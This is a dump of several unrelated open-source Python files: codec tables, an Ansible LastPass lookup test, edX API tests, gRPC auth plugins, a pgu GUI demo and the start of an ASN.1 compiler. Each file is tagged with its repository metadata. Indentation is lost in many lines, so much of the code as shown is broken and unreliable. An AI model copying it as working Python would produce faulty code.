0x00a0: 0x00ff, # NO-BREAK SPACE
0x00a1: 0x00ad, # INVERTED EXCLAMATION MARK
0x00a2: 0x009b, # CENT SIGN
0x00a3: 0x009c, # POUND SIGN
0x00a5: 0x009d, # YEN SIGN
0x00aa: 0x00a6, # FEMININE ORDINAL INDICATOR
0x00ab: 0x00ae, # LEFT-POINTING DOUBLE ANGLE QUOTATION MARK
0x00ac: 0x00aa, # NOT SIGN
0x00b0: 0x00f8, # DEGREE SIGN
0x00b1: 0x00f1, # PLUS-MINUS SIGN
0x00b2: 0x00fd, # SUPERSCRIPT TWO
0x00b5: 0x00e6, # MICRO SIGN
0x00b7: 0x00fa, # MIDDLE DOT
0x00ba: 0x00a7, # MASCULINE ORDINAL INDICATOR
0x00bb: 0x00af, # RIGHT-POINTING DOUBLE ANGLE QUOTATION MARK
0x00bc: 0x00ac, # VULGAR FRACTION ONE QUARTER
0x00bd: 0x00ab, # VULGAR FRACTION ONE HALF
0x00bf: 0x00a8, # INVERTED QUESTION MARK
0x00c4: 0x008e, # LATIN CAPITAL LETTER A WITH DIAERESIS
0x00c5: 0x008f, # LATIN CAPITAL LETTER A WITH RING ABOVE
0x00c6: 0x0092, # LATIN CAPITAL LIGATURE AE
0x00c7: 0x0080, # LATIN CAPITAL LETTER C WITH CEDILLA
0x00c9: 0x0090, # LATIN CAPITAL LETTER E WITH ACUTE
0x00d1: 0x00a5, # LATIN CAPITAL LETTER N WITH TILDE
0x00d6: 0x0099, # LATIN CAPITAL LETTER O WITH DIAERESIS
0x00dc: 0x009a, # LATIN CAPITAL LETTER U WITH DIAERESIS
0x00df: 0x00e1, # LATIN SMALL LETTER SHARP S
0x00e0: 0x0085, # LATIN SMALL LETTER A WITH GRAVE
0x00e1: 0x00a0, # LATIN SMALL LETTER A WITH ACUTE
0x00e2: 0x0083, # LATIN SMALL LETTER A WITH CIRCUMFLEX
0x00e4: 0x0084, # LATIN SMALL LETTER A WITH DIAERESIS
0x00e5: 0x0086, # LATIN SMALL LETTER A WITH RING ABOVE
0x00e6: 0x0091, # LATIN SMALL LIGATURE AE
0x00e7: 0x0087, # LATIN SMALL LETTER C WITH CEDILLA
0x00e8: 0x008a, # LATIN SMALL LETTER E WITH GRAVE
0x00e9: 0x0082, # LATIN SMALL LETTER E WITH ACUTE
0x00ea: 0x0088, # LATIN SMALL LETTER E WITH CIRCUMFLEX
0x00eb: 0x0089, # LATIN SMALL LETTER E WITH DIAERESIS
0x00ec: 0x008d, # LATIN SMALL LETTER I WITH GRAVE
0x00ed: 0x00a1, # LATIN SMALL LETTER I WITH ACUTE
0x00ee: 0x008c, # LATIN SMALL LETTER I WITH CIRCUMFLEX
0x00ef: 0x008b, # LATIN SMALL LETTER I WITH DIAERESIS
0x00f1: 0x00a4, # LATIN SMALL LETTER N WITH TILDE
0x00f2: 0x0095, # LATIN SMALL LETTER O WITH GRAVE
0x00f3: 0x00a2, # LATIN SMALL LETTER O WITH ACUTE
0x00f4: 0x0093, # LATIN SMALL LETTER O WITH CIRCUMFLEX
0x00f6: 0x0094, # LATIN SMALL LETTER O WITH DIAERESIS
0x00f7: 0x00f6, # DIVISION SIGN
0x00f9: 0x0097, # LATIN SMALL LETTER U WITH GRAVE
0x00fa: 0x00a3, # LATIN SMALL LETTER U WITH ACUTE
0x00fb: 0x0096, # LATIN SMALL LETTER U WITH CIRCUMFLEX
0x00fc: 0x0081, # LATIN SMALL LETTER U WITH DIAERESIS
0x00ff: 0x0098, # LATIN SMALL LETTER Y WITH DIAERESIS
0x0192: 0x009f, # LATIN SMALL LETTER F WITH HOOK
0x0393: 0x00e2, # GREEK CAPITAL LETTER GAMMA
0x0398: 0x00e9, # GREEK CAPITAL LETTER THETA
0x03a3: 0x00e4, # GREEK CAPITAL LETTER SIGMA
0x03a6: 0x00e8, # GREEK CAPITAL LETTER PHI
0x03a9: 0x00ea, # GREEK CAPITAL LETTER OMEGA
0x03b1: 0x00e0, # GREEK SMALL LETTER ALPHA
0x03b4: 0x00eb, # GREEK SMALL LETTER DELTA
0x03b5: 0x00ee, # GREEK SMALL LETTER EPSILON
0x03c0: 0x00e3, # GREEK SMALL LETTER PI
0x03c3: 0x00e5, # GREEK SMALL LETTER SIGMA
0x03c4: 0x00e7, # GREEK SMALL LETTER TAU
0x03c6: 0x00ed, # GREEK SMALL LETTER PHI
0x207f: 0x00fc, # SUPERSCRIPT LATIN SMALL LETTER N
0x20a7: 0x009e, # PESETA SIGN
0x2219: 0x00f9, # BULLET OPERATOR
0x221a: 0x00fb, # SQUARE ROOT
0x221e: 0x00ec, # INFINITY
0x2229: 0x00ef, # INTERSECTION
0x2248: 0x00f7, # ALMOST EQUAL TO
0x2261: 0x00f0, # IDENTICAL TO
0x2264: 0x00f3, # LESS-THAN OR EQUAL TO
0x2265: 0x00f2, # GREATER-THAN OR EQUAL TO
0x2310: 0x00a9, # REVERSED NOT SIGN
0x2320: 0x00f4, # TOP HALF INTEGRAL
0x2321: 0x00f5, # BOTTOM HALF INTEGRAL
0x2500: 0x00c4, # BOX DRAWINGS LIGHT HORIZONTAL
0x2502: 0x00b3, # BOX DRAWINGS LIGHT VERTICAL
0x250c: 0x00da, # BOX DRAWINGS LIGHT DOWN AND RIGHT
0x2510: 0x00bf, # BOX DRAWINGS LIGHT DOWN AND LEFT
0x2514: 0x00c0, # BOX DRAWINGS LIGHT UP AND RIGHT
0x2518: 0x00d9, # BOX DRAWINGS LIGHT UP AND LEFT
0x251c: 0x00c3, # BOX DRAWINGS LIGHT VERTICAL AND RIGHT
0x2524: 0x00b4, # BOX DRAWINGS LIGHT VERTICAL AND LEFT
0x252c: 0x00c2, # BOX DRAWINGS LIGHT DOWN AND HORIZONTAL
0x2534: 0x00c1, # BOX DRAWINGS LIGHT UP AND HORIZONTAL
0x253c: 0x00c5, # BOX DRAWINGS LIGHT VERTICAL AND HORIZONTAL
0x2550: 0x00cd, # BOX DRAWINGS DOUBLE HORIZONTAL
0x2551: 0x00ba, # BOX DRAWINGS DOUBLE VERTICAL
0x2552: 0x00d5, # BOX DRAWINGS DOWN SINGLE AND RIGHT DOUBLE
0x2553: 0x00d6, # BOX DRAWINGS DOWN DOUBLE AND RIGHT SINGLE
0x2554: 0x00c9, # BOX DRAWINGS DOUBLE DOWN AND RIGHT
0x2555: 0x00b8, # BOX DRAWINGS DOWN SINGLE AND LEFT DOUBLE
0x2556: 0x00b7, # BOX DRAWINGS DOWN DOUBLE AND LEFT SINGLE
0x2557: 0x00bb, # BOX DRAWINGS DOUBLE DOWN AND LEFT
0x2558: 0x00d4, # BOX DRAWINGS UP SINGLE AND RIGHT DOUBLE
0x2559: 0x00d3, # BOX DRAWINGS UP DOUBLE AND RIGHT SINGLE
0x255a: 0x00c8, # BOX DRAWINGS DOUBLE UP AND RIGHT
0x255b: 0x00be, # BOX DRAWINGS UP SINGLE AND LEFT DOUBLE
0x255c: 0x00bd, # BOX DRAWINGS UP DOUBLE AND LEFT SINGLE
0x255d: 0x00bc, # BOX DRAWINGS DOUBLE UP AND LEFT
0x255e: 0x00c6, # BOX DRAWINGS VERTICAL SINGLE AND RIGHT DOUBLE
0x255f: 0x00c7, # BOX DRAWINGS VERTICAL DOUBLE AND RIGHT SINGLE
0x2560: 0x00cc, # BOX DRAWINGS DOUBLE VERTICAL AND RIGHT
0x2561: 0x00b5, # BOX DRAWINGS VERTICAL SINGLE AND LEFT DOUBLE
0x2562: 0x00b6, # BOX DRAWINGS VERTICAL DOUBLE AND LEFT SINGLE
0x2563: 0x00b9, # BOX DRAWINGS DOUBLE VERTICAL AND LEFT
0x2564: 0x00d1, # BOX DRAWINGS DOWN SINGLE AND HORIZONTAL DOUBLE
0x2565: 0x00d2, # BOX DRAWINGS DOWN DOUBLE AND HORIZONTAL SINGLE
0x2566: 0x00cb, # BOX DRAWINGS DOUBLE DOWN AND HORIZONTAL
0x2567: 0x00cf, # BOX DRAWINGS UP SINGLE AND HORIZONTAL DOUBLE
0x2568: 0x00d0, # BOX DRAWINGS UP DOUBLE AND HORIZONTAL SINGLE
0x2569: 0x00ca, # BOX DRAWINGS DOUBLE UP AND HORIZONTAL
0x256a: 0x00d8, # BOX DRAWINGS VERTICAL SINGLE AND HORIZONTAL DOUBLE
0x256b: 0x00d7, # BOX DRAWINGS VERTICAL DOUBLE AND HORIZONTAL SINGLE
0x256c: 0x00ce, # BOX DRAWINGS DOUBLE VERTICAL AND HORIZONTAL
0x2580: 0x00df, # UPPER HALF BLOCK
0x2584: 0x00dc, # LOWER HALF BLOCK
0x2588: 0x00db, # FULL BLOCK
0x258c: 0x00dd, # LEFT HALF BLOCK
0x2590: 0x00de, # RIGHT HALF BLOCK
0x2591: 0x00b0, # LIGHT SHADE
0x2592: 0x00b1, # MEDIUM SHADE
0x2593: 0x00b2, # DARK SHADE
0x25a0: 0x00fe, # BLACK SQUARE
}
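if __name__ == '__main__':
    # Illustrative sketch, not part of the generated module: round-trip one
    # byte through the tables above.  0xc9 decodes to U+2554 (BOX DRAWINGS
    # DOUBLE DOWN AND RIGHT) and encodes back to b'\xc9'.
    text, _ = Codec().decode(b'\xc9')
    data, _ = Codec().encode(text)
    print(repr(text), data)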
| Microvellum/Fluid-Designer | win64-vc/2.78/python/lib/encodings/cp437.py | Python | gpl-3.0 | 34,564 |
# (c)2016 Andrew Zenk <[email protected]>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from argparse import ArgumentParser
from units.compat import unittest
from units.compat.mock import patch
from ansible.errors import AnsibleError
from ansible.module_utils import six
from ansible.plugins.lookup.lastpass import LookupModule, LPass, LPassException
MOCK_ENTRIES = [{'username': 'user',
'name': 'Mock Entry',
'password': 't0pS3cret passphrase entry!',
'url': 'https://localhost/login',
'notes': 'Test\nnote with multiple lines.\n',
'id': '0123456789'}]
class MockLPass(LPass):
_mock_logged_out = False
_mock_disconnected = False
def _lookup_mock_entry(self, key):
for entry in MOCK_ENTRIES:
if key == entry['id'] or key == entry['name']:
return entry
def _run(self, args, stdin=None, expected_rc=0):
# Mock behavior of lpass executable
base_options = ArgumentParser(add_help=False)
base_options.add_argument('--color', default="auto", choices=['auto', 'always', 'never'])
p = ArgumentParser()
sp = p.add_subparsers(help='command', dest='subparser_name')
logout_p = sp.add_parser('logout', parents=[base_options], help='logout')
show_p = sp.add_parser('show', parents=[base_options], help='show entry details')
field_group = show_p.add_mutually_exclusive_group(required=True)
for field in MOCK_ENTRIES[0].keys():
field_group.add_argument("--{0}".format(field), default=False, action='store_true')
field_group.add_argument('--field', default=None)
show_p.add_argument('selector', help='Unique Name or ID')
args = p.parse_args(args)
def mock_exit(output='', error='', rc=0):
if rc != expected_rc:
raise LPassException(error)
return output, error
if args.color != 'never':
return mock_exit(error='Error: Mock only supports --color=never', rc=1)
if args.subparser_name == 'logout':
if self._mock_logged_out:
return mock_exit(error='Error: Not currently logged in', rc=1)
logged_in_error = 'Are you sure you would like to log out? [Y/n]'
if stdin and stdin.lower() == 'n\n':
return mock_exit(output='Log out: aborted.', error=logged_in_error, rc=1)
elif stdin and stdin.lower() == 'y\n':
return mock_exit(output='Log out: complete.', error=logged_in_error, rc=0)
else:
return mock_exit(error='Error: aborted response', rc=1)
if args.subparser_name == 'show':
if self._mock_logged_out:
return mock_exit(error='Error: Could not find decryption key.' +
' Perhaps you need to login with `lpass login`.', rc=1)
if self._mock_disconnected:
return mock_exit(error='Error: Couldn\'t resolve host name.', rc=1)
mock_entry = self._lookup_mock_entry(args.selector)
if args.field:
return mock_exit(output=mock_entry.get(args.field, ''))
elif args.password:
return mock_exit(output=mock_entry.get('password', ''))
elif args.username:
return mock_exit(output=mock_entry.get('username', ''))
elif args.url:
return mock_exit(output=mock_entry.get('url', ''))
elif args.name:
return mock_exit(output=mock_entry.get('name', ''))
elif args.id:
return mock_exit(output=mock_entry.get('id', ''))
elif args.notes:
return mock_exit(output=mock_entry.get('notes', ''))
raise LPassException('We should never get here')
class DisconnectedMockLPass(MockLPass):
_mock_disconnected = True
class LoggedOutMockLPass(MockLPass):
_mock_logged_out = True
class TestLPass(unittest.TestCase):
def test_lastpass_cli_path(self):
lp = MockLPass(path='/dev/null')
self.assertEqual('/dev/null', lp.cli_path)
def test_lastpass_build_args_logout(self):
lp = MockLPass()
self.assertEqual(['logout', '--color=never'], lp._build_args("logout"))
def test_lastpass_logged_in_true(self):
lp = MockLPass()
self.assertTrue(lp.logged_in)
def test_lastpass_logged_in_false(self):
lp = LoggedOutMockLPass()
self.assertFalse(lp.logged_in)
def test_lastpass_show_disconnected(self):
lp = DisconnectedMockLPass()
with self.assertRaises(LPassException):
lp.get_field('0123456789', 'username')
def test_lastpass_show(self):
lp = MockLPass()
for entry in MOCK_ENTRIES:
entry_id = entry.get('id')
for k, v in six.iteritems(entry):
self.assertEqual(v.strip(), lp.get_field(entry_id, k))
class TestLastpassPlugin(unittest.TestCase):
@patch('ansible.plugins.lookup.lastpass.LPass', new=MockLPass)
def test_lastpass_plugin_normal(self):
lookup_plugin = LookupModule()
for entry in MOCK_ENTRIES:
entry_id = entry.get('id')
for k, v in six.iteritems(entry):
self.assertEqual(v.strip(),
lookup_plugin.run([entry_id], field=k)[0])
@patch('ansible.plugins.lookup.lastpass.LPass', LoggedOutMockLPass)
def test_lastpass_plugin_logged_out(self):
lookup_plugin = LookupModule()
entry = MOCK_ENTRIES[0]
entry_id = entry.get('id')
with self.assertRaises(AnsibleError):
lookup_plugin.run([entry_id], field='password')
@patch('ansible.plugins.lookup.lastpass.LPass', DisconnectedMockLPass)
def test_lastpass_plugin_disconnected(self):
lookup_plugin = LookupModule()
entry = MOCK_ENTRIES[0]
entry_id = entry.get('id')
with self.assertRaises(AnsibleError):
lookup_plugin.run([entry_id], field='password')
| roadmapper/ansible | test/units/plugins/lookup/test_lastpass.py | Python | gpl-3.0 | 6,829 |
"""
Tests for course_info
"""
from django.test.utils import override_settings
from django.core.urlresolvers import reverse
from rest_framework.test import APITestCase
from xmodule.modulestore.tests.factories import CourseFactory
from xmodule.modulestore.tests.django_utils import ModuleStoreTestCase
from courseware.tests.factories import UserFactory
from courseware.tests.tests import TEST_DATA_MONGO_MODULESTORE
@override_settings(MODULESTORE=TEST_DATA_MONGO_MODULESTORE)
class TestVideoOutline(ModuleStoreTestCase, APITestCase):
"""
Tests for /api/mobile/v0.5/course_info/...
"""
def setUp(self):
super(TestVideoOutline, self).setUp()
self.user = UserFactory.create()
self.course = CourseFactory.create(mobile_available=True)
self.client.login(username=self.user.username, password='test')
def test_about(self):
url = reverse('course-about-detail', kwargs={'course_id': unicode(self.course.id)})
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
self.assertTrue('overview' in response.data) # pylint: disable=E1103
def test_handouts(self):
url = reverse('course-handouts-list', kwargs={'course_id': unicode(self.course.id)})
response = self.client.get(url)
self.assertEqual(response.status_code, 404)
def test_updates(self):
url = reverse('course-updates-list', kwargs={'course_id': unicode(self.course.id)})
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
self.assertEqual(response.data, []) # pylint: disable=E1103
# TODO: add handouts and updates, somehow
| c0710204/edx-platform | lms/djangoapps/mobile_api/course_info/tests.py | Python | agpl-3.0 | 1,679 |
def main():
with open('file.txt'):
print(42) | smmribeiro/intellij-community | python/testData/quickFixes/PyRemoveUnusedLocalQuickFixTest/withOneTarget_after.py | Python | apache-2.0 | 56 |
# Copyright 2016 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""GRPCAuthMetadataPlugins for standard authentication."""
import inspect
from concurrent import futures
import grpc
def _sign_request(callback, token, error):
metadata = (('authorization', 'Bearer {}'.format(token)),)
callback(metadata, error)
def _create_get_token_callback(callback):
def get_token_callback(future):
try:
access_token = future.result().access_token
except Exception as exception: # pylint: disable=broad-except
_sign_request(callback, None, exception)
else:
_sign_request(callback, access_token, None)
return get_token_callback
class GoogleCallCredentials(grpc.AuthMetadataPlugin):
"""Metadata wrapper for GoogleCredentials from the oauth2client library."""
def __init__(self, credentials):
self._credentials = credentials
self._pool = futures.ThreadPoolExecutor(max_workers=1)
# Hack to determine if these are JWT creds and we need to pass
# additional_claims when getting a token
self._is_jwt = 'additional_claims' in inspect.getargspec(
credentials.get_access_token).args
def __call__(self, context, callback):
# MetadataPlugins cannot block (see grpc.beta.interfaces.py)
if self._is_jwt:
future = self._pool.submit(
self._credentials.get_access_token,
additional_claims={'aud': context.service_url})
else:
future = self._pool.submit(self._credentials.get_access_token)
future.add_done_callback(_create_get_token_callback(callback))
def __del__(self):
self._pool.shutdown(wait=False)
class AccessTokenCallCredentials(grpc.AuthMetadataPlugin):
"""Metadata wrapper for raw access token credentials."""
def __init__(self, access_token):
self._access_token = access_token
def __call__(self, context, callback):
_sign_request(callback, self._access_token, None)
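if __name__ == '__main__':
    # Illustrative sketch, not part of the original module: wrap a raw-token
    # plugin into per-call credentials.  The token value is a placeholder.
    call_credentials = grpc.metadata_call_credentials(
        AccessTokenCallCredentials('example-access-token'))
    print(call_credentials)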
| quizlet/grpc | src/python/grpcio/grpc/_auth.py | Python | apache-2.0 | 2,543 |
# Copyright 2015 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except
# in compliance with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software distributed under the License
# is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express
# or implied. See the License for the specific language governing permissions and limitations under
# the License.
from __future__ import absolute_import
from . import _bigquery
__all__ = ['_bigquery']
| jdanbrown/pydatalab | google/datalab/bigquery/commands/__init__.py | Python | apache-2.0 | 679 |
"""Tables, Widgets, and Groups!
An example of tables and most of the included widgets.
"""
import pygame
from pygame.locals import *
# the following line is not needed if pgu is installed
import sys; sys.path.insert(0, "..")
from pgu import gui
# Load an alternate theme to show how it is done. You can also
# specify a path (absolute or relative) to your own custom theme:
#
# app = gui.Desktop(theme=gui.Theme("path/to/theme"))
#
app = gui.Desktop()
app.connect(gui.QUIT,app.quit,None)
##The table code is entered much like HTML.
##::
c = gui.Table()
c.tr()
c.td(gui.Label("Gui Widgets"),colspan=4)
def cb():
print("Clicked!")
btn = gui.Button("Click Me!")
btn.connect(gui.CLICK, cb)
c.tr()
c.td(gui.Label("Button"))
c.td(btn,colspan=3)
##
c.tr()
c.td(gui.Label("Switch"))
c.td(gui.Switch(False),colspan=3)
c.tr()
c.td(gui.Label("Checkbox"))
##Note how Groups are used for Radio buttons, Checkboxes, and Tools.
##::
g = gui.Group(value=[1,3])
c.td(gui.Checkbox(g,value=1))
c.td(gui.Checkbox(g,value=2))
c.td(gui.Checkbox(g,value=3))
##
c.tr()
c.td(gui.Label("Radio"))
g = gui.Group()
c.td(gui.Radio(g,value=1))
c.td(gui.Radio(g,value=2))
c.td(gui.Radio(g,value=3))
c.tr()
c.td(gui.Label("Select"))
e = gui.Select()
e.add("Goat",'goat')
e.add("Horse",'horse')
e.add("Dog",'dog')
e.add("Pig",'pig')
c.td(e,colspan=3)
c.tr()
c.td(gui.Label("Tool"))
g = gui.Group(value='b')
c.td(gui.Tool(g,gui.Label('A'),value='a'))
c.td(gui.Tool(g,gui.Label('B'),value='b'))
c.td(gui.Tool(g,gui.Label('C'),value='c'))
c.tr()
c.td(gui.Label("Input"))
def cb():
print("Input received")
w = gui.Input(value='Cuzco',size=8)
w.connect("activate", cb)
c.td(w,colspan=3)
c.tr()
c.td(gui.Label("Slider"))
c.td(gui.HSlider(value=23,min=0,max=100,size=20,width=120),colspan=3)
c.tr()
c.td(gui.Label("Keysym"))
c.td(gui.Keysym(),colspan=3)
c.tr()
c.td(gui.Label("Text Area"), colspan=4, align=-1)
c.tr()
c.td(gui.TextArea(value="Cuzco the Goat", width=150, height=70), colspan=4)
app.run(c)
| danstoner/python_experiments | pgu/examples/gui5.py | Python | gpl-2.0 | 1,996 |
# simple __init__.py
from .pidSVG import *
| ptosco/rdkit | rdkit/sping/SVG/__init__.py | Python | bsd-3-clause | 44 |
#!/usr/bin/env python
#
# asn2wrs.py
# ASN.1 to Wireshark dissector compiler
# Copyright 2004 Tomas Kukosa
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, and/or sell copies of the Software, and to permit persons
# to whom the Software is furnished to do so, provided that the above
# copyright notice(s) and this permission notice appear in all copies of
# the Software and that both the above copyright notice(s) and this
# permission notice appear in supporting documentation.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT
# OF THIRD PARTY RIGHTS. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
# HOLDERS INCLUDED IN THIS NOTICE BE LIABLE FOR ANY CLAIM, OR ANY SPECIAL
# INDIRECT OR CONSEQUENTIAL DAMAGES, OR ANY DAMAGES WHATSOEVER RESULTING
# FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT,
# NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION
# WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
#
# Except as contained in this notice, the name of a copyright holder
# shall not be used in advertising or otherwise to promote the sale, use
# or other dealings in this Software without prior written authorization
# of the copyright holder.
"""ASN.1 to Wireshark dissector compiler"""
#
# Compiler from ASN.1 specification to the Wireshark dissector
#
# Based on ASN.1 to Python compiler from Aaron S. Lav's PyZ3950 package licensed under the X Consortium license
# http://www.pobox.com/~asl2/software/PyZ3950/
# (ASN.1 to Python compiler functionality is broken but not removed; it could be revived if necessary)
#
# It requires Dave Beazley's PLY parsing package licensed under the LGPL (tested with version 2.3)
# http://www.dabeaz.com/ply/
#
#
# ITU-T Recommendation X.680 (07/2002),
# Information technology - Abstract Syntax Notation One (ASN.1): Specification of basic notation
#
# ITU-T Recommendation X.681 (07/2002),
# Information technology - Abstract Syntax Notation One (ASN.1): Information object specification
#
# ITU-T Recommendation X.682 (07/2002),
# Information technology - Abstract Syntax Notation One (ASN.1): Constraint specification
#
# ITU-T Recommendation X.683 (07/2002),
# Information technology - Abstract Syntax Notation One (ASN.1): Parameterization of ASN.1 specifications
#
# ITU-T Recommendation X.880 (07/1994),
# Information technology - Remote Operations: Concepts, model and notation
#
import warnings
import re
import sys
import os
import os.path
import time
import getopt
import traceback
import lex
import yacc
if sys.version_info[0] < 3:
from string import maketrans
# OID name -> number conversion table
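# (keys are prefixed with the already-resolved parent arcs, so a name such as
#  '/itu-t recommendation h' would resolve via '/itu-t' -> 0,
#  '0/recommendation' -> 0, '0.0/h' -> 8, i.e. OID 0.0.8 -- an inferred
#  reading of the table; the lookup code itself is not shown here)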
oid_names = {
'/itu-t' : 0,
'/itu' : 0,
'/ccitt' : 0,
'/itu-r' : 0,
'0/recommendation' : 0,
'0.0/a' : 1,
'0.0/b' : 2,
'0.0/c' : 3,
'0.0/d' : 4,
'0.0/e' : 5,
'0.0/f' : 6,
'0.0/g' : 7,
'0.0/h' : 8,
'0.0/i' : 9,
'0.0/j' : 10,
'0.0/k' : 11,
'0.0/l' : 12,
'0.0/m' : 13,
'0.0/n' : 14,
'0.0/o' : 15,
'0.0/p' : 16,
'0.0/q' : 17,
'0.0/r' : 18,
'0.0/s' : 19,
'0.0/t' : 20,
'0.0/tseries' : 20,
'0.0/u' : 21,
'0.0/v' : 22,
'0.0/w' : 23,
'0.0/x' : 24,
'0.0/y' : 25,
'0.0/z' : 26,
'0/question' : 1,
'0/administration' : 2,
'0/network-operator' : 3,
'0/identified-organization' : 4,
'0/r-recommendation' : 5,
'0/data' : 9,
'/iso' : 1,
'1/standard' : 0,
'1/registration-authority' : 1,
'1/member-body' : 2,
'1/identified-organization' : 3,
'/joint-iso-itu-t' : 2,
'/joint-iso-ccitt' : 2,
'2/presentation' : 0,
'2/asn1' : 1,
'2/association-control' : 2,
'2/reliable-transfer' : 3,
'2/remote-operations' : 4,
'2/ds' : 5,
'2/directory' : 5,
'2/mhs' : 6,
'2/mhs-motis' : 6,
'2/ccr' : 7,
'2/oda' : 8,
'2/ms' : 9,
'2/osi-management' : 9,
'2/transaction-processing' : 10,
'2/dor' : 11,
'2/distinguished-object-reference' : 11,
'2/reference-data-transfe' : 12,
'2/network-layer' : 13,
'2/network-layer-management' : 13,
'2/transport-layer' : 14,
'2/transport-layer-management' : 14,
'2/datalink-layer' : 15,
'2/datalink-layer-managemen' : 15,
'2/datalink-layer-management-information' : 15,
'2/country' : 16,
'2/registration-procedures' : 17,
'2/registration-procedure' : 17,
'2/physical-layer' : 18,
'2/physical-layer-management' : 18,
'2/mheg' : 19,
'2/genericULS' : 20,
'2/generic-upper-layers-security' : 20,
'2/guls' : 20,
'2/transport-layer-security-protocol' : 21,
'2/network-layer-security-protocol' : 22,
'2/international-organizations' : 23,
'2/internationalRA' : 23,
'2/sios' : 24,
'2/uuid' : 25,
'2/odp' : 26,
'2/upu' : 40,
}
ITEM_FIELD_NAME = '_item'
UNTAG_TYPE_NAME = '_untag'
def asn2c(id):
return id.replace('-', '_').replace('.', '_').replace('&', '_')
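# e.g. asn2c('h245.h323-message-body') -> 'h245_h323_message_body'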
input_file = None
g_conform = None
lexer = None
in_oid = False
class LexError(Exception):
def __init__(self, tok, filename=None):
self.tok = tok
self.filename = filename
self.msg = "Unexpected character %r" % (self.tok.value[0])
Exception.__init__(self, self.msg)
def __repr__(self):
return "%s:%d: %s" % (self.filename, self.tok.lineno, self.msg)
__str__ = __repr__
class ParseError(Exception):
def __init__(self, tok, filename=None):
self.tok = tok
self.filename = filename
self.msg = "Unexpected token %s(%r)" % (self.tok.type, self.tok.value)
Exception.__init__(self, self.msg)
def __repr__(self):
return "%s:%d: %s" % (self.filename, self.tok.lineno, self.msg)
__str__ = __repr__
class DuplicateError(Exception):
def __init__(self, type, ident):
self.type = type
self.ident = ident
self.msg = "Duplicate %s for %s" % (self.type, self.ident)
Exception.__init__(self, self.msg)
def __repr__(self):
return self.msg
__str__ = __repr__
class CompError(Exception):
def __init__(self, msg):
self.msg = msg
Exception.__init__(self, self.msg)
def __repr__(self):
return self.msg
__str__ = __repr__
states = (
('braceignore','exclusive'),
)
precedence = (
('left', 'UNION', 'BAR'),
('left', 'INTERSECTION', 'CIRCUMFLEX'),
)
# 11 ASN.1 lexical items
static_tokens = {
r'::=' : 'ASSIGNMENT', # 11.16 Assignment lexical item
r'\.\.' : 'RANGE', # 11.17 Range separator
r'\.\.\.' : 'ELLIPSIS', # 11.18 Ellipsis
r'\[\[' : 'LVERBRACK', # 11.19 Left version brackets
r'\]\]' : 'RVERBRACK', # 11.20 Right version brackets
# 11.26 Single character lexical items
r'\{' : 'LBRACE',
r'\}' : 'RBRACE',
r'<' : 'LT',
#r'>' : 'GT',
r',' : 'COMMA',
r'\.' : 'DOT',
r'\(' : 'LPAREN',
r'\)' : 'RPAREN',
r'\[' : 'LBRACK',
r'\]' : 'RBRACK',
r'-' : 'MINUS',
r':' : 'COLON',
#r'=' : 'EQ',
#r'"' : 'QUOTATION',
#r"'" : 'APOSTROPHE',
r';' : 'SEMICOLON',
r'@' : 'AT',
r'\!' : 'EXCLAMATION',
r'\^' : 'CIRCUMFLEX',
r'\&' : 'AMPERSAND',
r'\|' : 'BAR'
}
# 11.27 Reserved words
# all keys in reserved_words must start w/ upper case
reserved_words = {
'ABSENT' : 'ABSENT',
'ABSTRACT-SYNTAX' : 'ABSTRACT_SYNTAX',
'ALL' : 'ALL',
'APPLICATION' : 'APPLICATION',
'AUTOMATIC' : 'AUTOMATIC',
'BEGIN' : 'BEGIN',
'BIT' : 'BIT',
'BOOLEAN' : 'BOOLEAN',
'BY' : 'BY',
'CHARACTER' : 'CHARACTER',
'CHOICE' : 'CHOICE',
'CLASS' : 'CLASS',
'COMPONENT' : 'COMPONENT',
'COMPONENTS' : 'COMPONENTS',
'CONSTRAINED' : 'CONSTRAINED',
'CONTAINING' : 'CONTAINING',
'DEFAULT' : 'DEFAULT',
'DEFINITIONS' : 'DEFINITIONS',
'EMBEDDED' : 'EMBEDDED',
# 'ENCODED' : 'ENCODED',
'END' : 'END',
'ENUMERATED' : 'ENUMERATED',
# 'EXCEPT' : 'EXCEPT',
'EXPLICIT' : 'EXPLICIT',
'EXPORTS' : 'EXPORTS',
# 'EXTENSIBILITY' : 'EXTENSIBILITY',
'EXTERNAL' : 'EXTERNAL',
'FALSE' : 'FALSE',
'FROM' : 'FROM',
'GeneralizedTime' : 'GeneralizedTime',
'IDENTIFIER' : 'IDENTIFIER',
'IMPLICIT' : 'IMPLICIT',
# 'IMPLIED' : 'IMPLIED',
